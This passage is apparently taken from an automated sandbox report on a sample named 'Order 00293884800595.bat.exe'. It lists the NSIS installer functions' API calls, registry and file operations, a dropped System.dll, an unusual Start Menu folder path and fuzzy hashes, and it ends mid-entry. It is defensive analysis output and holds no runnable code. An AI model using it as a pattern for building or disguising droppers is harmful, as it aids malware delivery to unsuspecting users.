Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne,00000000,00000000,00000031), ref: 004017BD
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne,00000000,00000000,00000031), ref: 004017E7

Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,humpende Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A

Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0), ref: 0040542D
Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll), ref: 0040543F
Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D

Strings

C:\Users\user\AppData\Local\Temp\nsf55F0.tmp, xrefs: 004017C8, 00401837, 00401855
C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll, xrefs: 0040184B, 00401867
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne, xrefs: 004017AB
Call, xrefs: 0040179A, 004017B0, 004017C2, 004017D3, 00401809, 0040181F, 0040183D, 0040187D, 004018FE, 00401907, 00401911, 0040191C

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp$C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne$Call
API String ID: 1941528284-2665453816
Opcode ID: 0acf61fd71f3edde6b321a3403c7c5eac4b41d6d52f200133c1c8b0501db61a2
Instruction ID: a1f186b67c4edeb34fad59b9cedf70daa635d1c2101920768012b0df21243cfe
Opcode Fuzzy Hash: 0acf61fd71f3edde6b321a3403c7c5eac4b41d6d52f200133c1c8b0501db61a2
Instruction Fuzzy Hash: 6041C331900515BBCB107BA5CD46EAF3A78DF05328F20823FF526F11E2D67C8A519AAD

Function 004053D1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0), ref: 0040542D
SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll), ref: 0040543F
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll, xrefs: 004053F1, 00405403, 00405409, 0040542C, 00405438

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll
API String ID: 2531174081-2128095855
Opcode ID: 04eedc2ba923f0a8d7eb9848a27cab945aaff25bd16a1fb9afb004099d42d10e
Instruction ID: 7fccb86dafa480228006d80d04b82b7e1b017f67e9930a1aa42837d262fd4390
Opcode Fuzzy Hash: 04eedc2ba923f0a8d7eb9848a27cab945aaff25bd16a1fb9afb004099d42d10e
Instruction Fuzzy Hash: 81218971900118BBDF11AFA5CD85ADEBFA9EB05354F14807AF944B6291C6788E81CFA8

Function 00403168 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004031CF
GetTickCount.KERNEL32 ref: 00403276
MulDiv.KERNEL32(7FFFFFFF,00000064,00000008), ref: 0040329F
wsprintfA.USER32 ref: 004032AF

Strings

@DB, xrefs: 00403253, 0040326E, 004032E5
... %d%%, xrefs: 004032A9

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$@DB
API String ID: 551687249-1316549817
Opcode ID: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
Instruction ID: 381bea1cd078569db79acba847b1f3aad866332683383cfda6df38e9538e1e3d
Opcode Fuzzy Hash: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
Instruction Fuzzy Hash: 91513D71800219EBDB10DF65DA84B9E7BB8EB5535AF14417BEC00B72D0CB789A50CBA9

Function 00406647 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
wsprintfA.USER32 ref: 00406697
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB

Strings

%s%s.dll, xrefs: 00406691
UXTHEME, xrefs: 00406650
\, xrefs: 0040666F

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
Instruction ID: e759eb08ac56218b9122c2e4f19d02add1096545fd4a6e696b7e3c492baae584
Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
Instruction Fuzzy Hash: 74F0FC305002096BDF149B74DD0DFEB365CAF08704F14097AA586E10D1E9B9D4758B69

Function 00402D60 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
Instruction ID: 6dce0a33df475c695949d28520f5422678f12aee2cc84e9e423a55bf09ef2c56
Opcode Fuzzy Hash: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
Instruction Fuzzy Hash: 3B215C7250010CBBDF129F90CE89EEF7B6DEB44344F100076FA15B11A0E7B48F54AAA8

Function 6CA5176B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6CA51B28: GlobalFree.KERNEL32(?), ref: 6CA51D99
Part of subcall function 6CA51B28: GlobalFree.KERNEL32(?), ref: 6CA51D9E
Part of subcall function 6CA51B28: GlobalFree.KERNEL32(?), ref: 6CA51DA3

GlobalFree.KERNEL32(00000000), ref: 6CA51816
FreeLibrary.KERNEL32(?), ref: 6CA51899
GlobalFree.KERNEL32(00000000), ref: 6CA518BE

Part of subcall function 6CA5233F: GlobalAlloc.KERNEL32(00000040,?), ref: 6CA52370

Part of subcall function 6CA52742: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6CA517E7,00000000), ref: 6CA52812

Part of subcall function 6CA515FB: wsprintfA.USER32 ref: 6CA51629

Strings

, xrefs: 6CA5189F

Memory Dump Source

Source File: 00000005.00000002.1802235072457.000000006CA51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA50000, based on PE: true

Associated: 00000005.00000002.1802235017861.000000006CA50000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1802235118767.000000006CA54000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1802235161633.000000006CA56000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca50000_Order 00293884800595.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: d0768fdc8e244ab8798b9bce9a854bd426e45d452f4da22b46964c81127e5095
Instruction ID: cc40074014b996968d4cab0dd14e35d3cf4e5674ba8e4e6228e3698f7da1dc1c
Opcode Fuzzy Hash: d0768fdc8e244ab8798b9bce9a854bd426e45d452f4da22b46964c81127e5095
Instruction Fuzzy Hash: 9341B3715003059ACB049F788988BF637E8BF01318FD8C574EA169AA86DB74D4EDCBA0

Function 004024A3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00000023,00000011,00000002), ref: 004024EE
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00000000,00000011,00000002), ref: 0040252E
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00000000,00000011,00000002), ref: 00402612

Strings

C:\Users\user\AppData\Local\Temp\nsf55F0.tmp, xrefs: 004024DF, 004024ED, 00402501, 00402518, 00402523

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp
API String ID: 2655323295-4121408785
Opcode ID: 01be07207417a34e2fd7276a7f8dd5bd622f6c843808a50c06c527054a50520e
Instruction ID: bcff8488b3c7483af384f27edc247fb8d09a012b63b7e061f1957b9ca53072ec
Opcode Fuzzy Hash: 01be07207417a34e2fd7276a7f8dd5bd622f6c843808a50c06c527054a50520e
Instruction Fuzzy Hash: A5118172E04118BFEF10AFA59E49AAE7AB4EB44314F20443FF505F71D1C6B98D829A18

Function 00405E4F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405E63
GetTempFileNameA.KERNELBASE(0000000C,?,00000000,?,?,004033D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008), ref: 00405E7D

Strings

nsa, xrefs: 00405E5A
C:\Users\user\AppData\Local\Temp\, xrefs: 00405E52

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3756726018
Opcode ID: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
Instruction ID: 3970c65dfeb72379d163dc795dbdbe3f0392b49dfad0d6f3c406a96719355742
Opcode Fuzzy Hash: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
Instruction Fuzzy Hash: A0F082363042046BDB109F56EC04B9B7B9CEF91750F10803BF9889B180D6B099558798

Function 004020CA Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020F5

Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0), ref: 0040542D
Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll), ref: 0040543F
Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402105
GetProcAddress.KERNEL32(00000000,?), ref: 00402115
FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040217F

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
Instruction ID: 18bbb9f6491bb16bc869df63e9f5beea4603ad23440c914569cabcc4b16c920a
Opcode Fuzzy Hash: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
Instruction Fuzzy Hash: ED21C931A00115BBCF20BF659F89B6F7570AB40358F20413BF611B61D1CABD49839A5E

Function 004015E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,0000000C,00405D24,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,763F3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe"), ref: 00405CC6
Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401632

Part of subcall function 00405897: CreateDirectoryA.KERNELBASE(00431400,?), ref: 004058D9

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne,00000000,00000000,000000F0), ref: 00401661

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne, xrefs: 00401656

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne
API String ID: 1892508949-171433923
Opcode ID: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
Instruction ID: 0b6d2b43488905cbaa276f6c0cac56371e043703d2fe031d841b632f48d4a949
Opcode Fuzzy Hash: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
Instruction Fuzzy Hash: 3911E331904240AFDF307F754D41A7F26B0DA56724B68497FF891B22E2C63D49439A6E

Function 00406174 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000000,?,?,00406432,80000002), ref: 004061BA
RegCloseKey.KERNELBASE(?,?,00406432,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll), ref: 004061C5

Strings

Call, xrefs: 004061AB

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction ID: 11b83480b68dea0a629fd90b3ddfe96452127a043c469d5d543a73811e09722f
Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction Fuzzy Hash: 9A01D472500209ABCF22CF10CD05FDB3FA8EF54354F01403AF915A6191D774CA64CB94

Function 00401BAC Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(006C0360), ref: 00401C1B
GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401C2D

Strings

